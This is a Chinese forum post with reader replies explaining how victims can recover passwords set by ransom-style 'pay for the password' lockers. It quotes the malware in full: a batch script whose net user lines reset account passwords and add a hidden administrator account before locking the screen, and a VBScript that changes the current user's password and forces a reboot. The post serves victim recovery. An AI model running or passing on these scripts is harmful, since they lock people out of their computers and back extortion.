如何手动破解敲竹杠病毒（修改电脑开机密码要联系QQ的病...

昊情·

此类病毒目前只有两种形式，一种是基于脚本的文件，分为批处理和vbs脚本等，另一种是PE文件格式的exe程序，基于上术两种情况，现分别讲解破解方法
       脚本病毒破解：


文件名字随意，文件格式是.bat和.vbs格式，其对应的文件图标分别是


（如果接收到此类文件最后不要直接双击运行，而要编辑方式打开查看内容），这两种文件密码是明文形式，只要右键编辑打开就能找到密码。CF蓝水晶转英雄级.bat文件打开其内容是：
net user Administrator wsad1234+-    -----wsad1234+-即为Administrator帐号对应的密码
net user admin zouzou1314520           -----zouzou1314520即为admin 和要密码加753767785$帐号对应密码
net user 要密码加Q2697588286$ zouzou1314520 /add
net localgroup administrators 要密码加753767785$ /add
rundll32 user32,LockWorkStation

下面对这几行脚本进行简单说明：
net user Administrator wsad1234+- 更改用户名为Administrator 密码为wsad1234+-
net user 要密码加Q2697588286$ zouzou1314520 /add  新建一个用户名为要密码加Q2697588286$密码为zouzou1314520的帐户，默认为user组成员。
net localgroup administrators 要密码加753767785$ /add    把用户名要密码加753767785$添加到administrators 组（管理员组）

对于vbs文件，其内容如下：
password="2415123023"
file=fol & "\net.exe"
shut=fol & "\shutdown.exe"
ws.run file & " user %UserName% "+Chr(34) & password & Chr(34),0,True
ws.run shut & " /r /f /t 0",0
其密码已经自己写出来了password="2415123023"，对就是2415123023。
综上，脚本病毒更改密码就是使用net user 用户名 密码  的命令

    针对exe格式的可执行文件，需要使用行为监控工具MD来进行破解，首先是安装此软件(下载地址http://dl.pconline.com.cn/download/52312.html)，然后在设置里面改成“正常模式”，接着就运行病毒，进行一步一步监控，等到出现对应更改密码命令行，就可以看到密码了，如下qaz123，其更改密码命令还是使用net user 用户名 密码

MD5设置

监控密码更改

xiaoye

以前的60秒关机也是

ekeyyiming

。。昊情能吃嘛

xiaoqqf4

学习学习技术，加油！

wtsqq123

学习学习技术，加油！

wilist

支持中国红客联盟(ihonker.org)

wanmznh

感谢楼主的分享~

andy99

感谢分享--做过实操的确不错。

小龙